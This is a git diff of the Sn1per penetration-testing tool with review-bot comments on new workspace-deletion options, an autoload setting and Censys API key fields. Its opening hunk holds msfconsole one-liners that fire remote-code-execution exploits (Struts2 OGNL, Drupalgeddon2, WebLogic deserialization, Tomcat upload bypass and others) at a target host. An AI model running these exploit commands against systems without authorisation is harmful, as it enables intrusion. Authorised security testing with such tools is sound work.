"${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS 2 NAMESPACE REDIRECT OGNL INJECTION CVE-2018-11776 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/struts2_namespace_ognl; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED CISCO ASA TRAVERSAL CVE-2018-0296 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/http/cisco_directory_traversal; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" 
$LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING OSCOMMERCE INSTALLER RCE 
CVE-2018-2628 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw 2> /dev/null + SSL="true" + source modes/web_autopwn.sh fi source modes/osint_stage_2.sh fi diff --git a/sniper b/sniper index 624b310b..f57a2022 100755 --- a/sniper +++ b/sniper @@ -3,7 +3,7 @@ # + -- --=[https://xerosecurity.com # -VER="6.1" +VER="6.2" INSTALL_DIR="/usr/share/sniper" LOOT_DIR="$INSTALL_DIR/loot/$TARGET" SNIPER_PRO=$INSTALL_DIR/pro.sh @@ -73,6 +73,12 @@ function help { echo ' [*] LIST WORKSPACES' echo ' sniper --list' echo "" + echo ' [*] DELETE WORKSPACE' + echo ' sniper -w -d' + echo "" + echo ' [*] DELETE HOST FROM WORKSPACE' + echo ' sniper -w -t -dh' + echo "" echo ' [*] GET SNIPER SCAN STATUS' echo ' sniper --status' echo "" 
@@ -231,14 +237,33 @@ case $key in shift # past argument shift # past argument ;; + -d|--delete) + echo "Do you want to remove the workspace? $WORKSPACE_DIR" + read ANS + rm -Rf /usr/share/sniper/loot/workspace/$WORKSPACE/ + exit + shift # past argument + ;; + -dh|--delete-host) + echo "Do you want to remove $TARGET from $WORKSPACE?" + read ANS + sed -i "/$TARGET/d" $WORKSPACE_DIR/domains/targets-all-sorted.txt $WORKSPACE_DIR/domains/domains-all-sorted.txt $WORKSPACE_DIR/domains/targets.txt 2> /dev/null + rm -f $WORKSPACE_DIR/screenshots/$TARGET*.jpg 2> /dev/null + sniper --reimport -w $WORKSPACE + exit + shift # past argument + ;; --list) logo ls -l $INSTALL_DIR/loot/workspace/ echo "" echo "cd /usr/share/sniper/loot/workspace/" - SNIPER_PRO=$INSTALL_DIR/pro.sh - if [ -f $SNIPER_PRO ]; then + WORKSPACE_REPORT=$LOOT_DIR/sniper-report.html + if [ -f $WORKSPACE_REPORT ]; then echo -e "$OKORANGE + -- --=[Loading Sn1per Professional...$RESET" + $BROWSER $INSTALL_DIR/loot/workspace/sniper-report.html 2> /dev/null > /dev/null & + else + echo -e "$OKORANGE + -- --=[Loading workspaces...$RESET" $BROWSER $INSTALL_DIR/loot/workspace/ 2> /dev/null > /dev/null & fi exit 
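Review bot: The `-d|--delete` arm reads `ANS` but never tests it, so `rm -Rf /usr/share/sniper/loot/workspace/$WORKSPACE/` runs whatever the user answers, and when `$WORKSPACE` is unset (`-d` given without a preceding `-w`) the path collapses to the whole `loot/workspace/` tree. The `-dh|--delete-host` arm has the same unchecked prompt, and `sed -i "/$TARGET/d"` uses the target as an unanchored regex, so a dot matches any character, a target such as `example.com` also strips `sub.example.com` lines from the three lists, and an empty `$TARGET` becomes `/d`, which empties the files. In the `--list` arm the file tested (`$LOOT_DIR/sniper-report.html`) differs from the file opened (`$INSTALL_DIR/loot/workspace/sniper-report.html`), and `LOOT_DIR` is derived from `$TARGET`, which `--list` does not take. The `shift` after `exit` in both new arms is unreachable; the rewritten arms below check the answer, guard the variables with `${var:?}`, and remove the host as a whole-line fixed-string match.
```shell
    -d|--delete)
        echo "Do you want to remove the workspace? $WORKSPACE_DIR (y or n)"
        read ANS
        if [ "$ANS" == "y" ]; then
            # ${WORKSPACE:?} aborts instead of deleting the whole loot/workspace tree
            rm -Rf -- "/usr/share/sniper/loot/workspace/${WORKSPACE:?}/"
        fi
        exit
        ;;
    -dh|--delete-host)
        echo "Do you want to remove $TARGET from $WORKSPACE? (y or n)"
        read ANS
        if [ "$ANS" == "y" ] && [ -n "${TARGET:?}" ] && [ -n "${WORKSPACE:?}" ]; then
            for f in "$WORKSPACE_DIR/domains/targets-all-sorted.txt" "$WORKSPACE_DIR/domains/domains-all-sorted.txt" "$WORKSPACE_DIR/domains/targets.txt"; do
                # whole-line fixed-string match: no regex metacharacters, no substring hits on other hosts
                [ -f "$f" ] && { grep -vxF -- "$TARGET" "$f" > "$f.tmp"; mv -f -- "$f.tmp" "$f"; }
            done
            rm -f -- "$WORKSPACE_DIR/screenshots/$TARGET"*.jpg 2> /dev/null
            sniper --reimport -w "$WORKSPACE"
        fi
        exit
        ;;
    # … unchanged: --list arm …
```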
@@ -366,27 +391,20 @@ function loot { cd $LOOT_DIR if [ -f $SNIPER_PRO ]; then - echo -e "$OKORANGE + -- --=[Do you want to load Sn1per Professional (y or n)? $RESET" - read ANS - if [ "$ANS" == "y" ]; then + if [ "$SN1PER_AUTOLOAD" = "1" ]; then echo -e "$OKORANGE + -- --=[Loading Sn1per Professional...$RESET" source $INSTALL_DIR/pro.sh $BROWSER $LOOT_DIR/sniper-report.html 2> /dev/null > /dev/null & - echo -e "$OKORANGE + -- --=[Opening workspace directory...$RESET" - # DISABLED FOR V7 ONLY! - #echo -e "$OKORANGE + -- --=[Do you want to load all updated host reports (y or n)? $RESET" - #cat $UPDATED_TARGETS 2> /dev/null - #read ANS2 - #if [ "$ANS2" == "y" ]; then - # - # for a in `cat $UPDATED_TARGETS`; do - # $BROWSER "$LOOT_DIR/reports/sniper-$a.html" 2> /dev/null > /dev/null & - # done - # rm -f $UPDATED_TARGETS 2> /dev/null - # touch $UPDATED_TARGETS 2> /dev/null - #fi - else - echo -e "$OKORANGE + -- --=[Skipping report generation. $RESET" + else + echo -e "$OKORANGE + -- --=[Do you want to load Sn1per Professional (y or n)? $RESET" + read ANS + if [ "$ANS" == "y" ]; then + echo -e "$OKORANGE + -- --=[Loading Sn1per Professional...$RESET" + source $INSTALL_DIR/pro.sh + $BROWSER $LOOT_DIR/sniper-report.html 2> /dev/null > /dev/null & + else + echo -e "$OKORANGE + -- --=[Skipping report generation. $RESET" + fi fi else echo -e "$OKRED + -- --=[Sn1per Professional is not installed. To download Sn1per Professional, go to https://xerosecurity.com. $RESET" diff --git a/sniper.conf b/sniper.conf index d93d61f7..8ef725a1 100644 --- a/sniper.conf +++ b/sniper.conf @@ -21,6 +21,7 @@ REPORT="1" LOOT="1" METASPLOIT_IMPORT="0" SNIPER_PRO_CONSOLE_OUTPUT="0" +SN1PER_AUTOLOAD="1" # DEFAULT BROWSER BROWSER="firefox" 
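Review bot: The new `SN1PER_AUTOLOAD` branch duplicates the three-line load sequence (`echo`, `source $INSTALL_DIR/pro.sh`, `$BROWSER $LOOT_DIR/sniper-report.html …`) that the interactive branch already has, so any later change to how the report is opened has to be made twice. Folding the config value and the prompt answer into one decision keeps a single copy, as sketched below. The new test also uses `=` where the surrounding code uses `==`; both work in bash, but mixing them in one `if` chain reads as if they differed. `loot` begins and ends outside the hunk.
```shell
    if [ -f $SNIPER_PRO ]; then
        # config value decides first; fall back to asking only when autoload is off
        LOAD_PRO="$SN1PER_AUTOLOAD"
        if [ "$LOAD_PRO" != "1" ]; then
            echo -e "$OKORANGE + -- --=[Do you want to load Sn1per Professional (y or n)? $RESET"
            read ANS
            [ "$ANS" == "y" ] && LOAD_PRO="1"
        fi
        if [ "$LOAD_PRO" == "1" ]; then
            echo -e "$OKORANGE + -- --=[Loading Sn1per Professional...$RESET"
            source $INSTALL_DIR/pro.sh
            $BROWSER $LOOT_DIR/sniper-report.html 2> /dev/null > /dev/null &
        else
            echo -e "$OKORANGE + -- --=[Skipping report generation. $RESET"
        fi
    else
        # … unchanged: "Sn1per Professional is not installed" message …
```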
@@ -33,6 +34,10 @@ BURP_PORT="1337" MSF_LHOST="127.0.0.1" MSF_LPORT="4444" +# API KEYS +CENSYS_APP_ID="" +CENSYS_API_SECRET="" + # WEB BRUTE FORCE WORDLISTS WEB_BRUTE_STEALTH="$INSTALL_DIR/wordlists/web-brute-stealth.txt" WEB_BRUTE_FULL="$INSTALL_DIR/wordlists/web-brute-full.txt" 
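Review bot: `CENSYS_APP_ID` and `CENSYS_API_SECRET` place an API credential in a file that is sourced as shell from the install tree, so anyone who can read `sniper.conf` obtains the secret and anyone who can write it runs code as the user invoking sniper. The two lines need a comment stating how to protect them, e.g. `# Credentials: keep this file readable only by the user running sniper and never commit a filled-in copy`. Reading the secret from an environment variable or a separate mode-0600 file at the point of use would avoid storing it here at all; this is an inferred suggestion, since the code that consumes these values is not in this diff.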
@@ -57,6 +62,7 @@ QUICK_PORTS="21,22,23,25,53,80,110,137,138,139,161,162,443,445,512,513,514,1433, DEFAULT_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,67,68,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888
,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535,U:53,U:67,U:68,U:69,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049" DEFAULT_TCP_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,
12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535" DEFAULT_UDP_PORTS="53,67,68,69,88,123,161,162,137,138,139,389,520,2049" +FULL_PORTSCAN_PORTS="1-65535" THREADS="30" @@ -93,6 +99,7 @@ WHATWEB="1" WIG="1" SHOCKER="1" JEXBOSS="1" +WEBTECH="1" # ACTIVE WEB BRUTE FORCE STAGES WEB_BRUTE_STEALTHSCAN="1" @@ -117,3 +124,5 @@ SUBFINDER="1" DNSCAN="1" CRTSH="1" SUBOVER="1" +PROJECT_SONAR="1" +CENSYS_SUBDOMAINS="1" \ No newline at end of file